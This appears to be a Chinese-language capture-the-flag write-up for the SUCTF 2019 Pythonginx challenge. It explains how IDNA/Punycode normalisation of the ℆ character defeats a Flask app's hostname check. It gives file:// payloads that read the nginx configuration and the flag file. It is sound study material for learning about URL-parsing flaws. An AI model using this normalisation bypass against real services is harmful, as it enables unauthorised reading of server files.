[SUCTF 2019] Pythonginx#
知识点#
idna#
对于idna这种unicode,之前在blackhat 2019的ppt上看到过一回
对于idna的描述,wiki上大致是这样写的
An internationalized domain name (IDN) is an Internet domain name that contains at least one label that is displayed in software applications, in whole or in part, in a language-specific script or alphabet, such as Arabic, Chinese, Cyrillic, Devanagari, Hebrew or the Latin alphabet-based characters with diacritics or ligatures, such as French. These writing systems are encoded by computers in multibyte Unicode. Internationalized domain names are stored in the Domain Name System (DNS) as ASCII strings using Punycode transcription.
总的来说就是为了统一不同国家间的特殊字符域名而设计出来的一种编码
idna使用Punycode的方式进行编码
当我们尝试把idna转到utf-8的形式时,有的时候会发生一些特殊的转化
这样当浏览器或者是后端误以为其是utf-8而进行解码的话,就会导致严重的安全问题
解题#
进入题目看到源码
@app.route('/getUrl', methods=['GET', 'POST'])
def getUrl():
url = request.args.get("url")
host = parse.urlparse(url).hostname
if host == 'suctf.cc':
return "我扌 your problem? 111"
parts = list(urlsplit(url))
host = parts[1]
if host == 'suctf.cc':
return "我扌 your problem? 222 " + host
newhost = []
for h in host.split('.'):
newhost.append(h.encode('idna').decode('utf-8'))
parts[1] = '.'.join(newhost)
#去掉 url 中的空格
finalUrl = urlunsplit(parts).split(' ')[0]
host = parse.urlparse(finalUrl).hostname
if host == 'suctf.cc':
return urllib.request.urlopen(finalUrl).read()
else:
return "我扌 your problem? 333"
</code>
<!-- Dont worry about the suctf.cc. Go on! -->
<!-- Do you know the nginx? -->得到能用的信息
1. 输入的文本是经h.encode('idna').decode('utf-8')处理的
2. 大致切入点是suctf.cc这个字符串
3. 服务端是nginx,大致需要读nginx的配置文件nginx配置文件位置/usr/local/nginx/conf/nginx.conf
可以看到c和u恰好能够找到℆这样的字符来进行利用,能够直接进行配置文件的读取
利用文件协议读出文件
file://suctf.c℆sr/local/nginx/conf/nginx.confserver { listen 80; location / { try_files $uri @app; } location @app { include uwsgi_params; uwsgi_pass unix:///tmp/uwsgi.sock; } location /static { alias /app/static; } # location /flag { # alias /usr/fffffflag; # } }再读出flag
file://suctf.c℆sr/fffffflag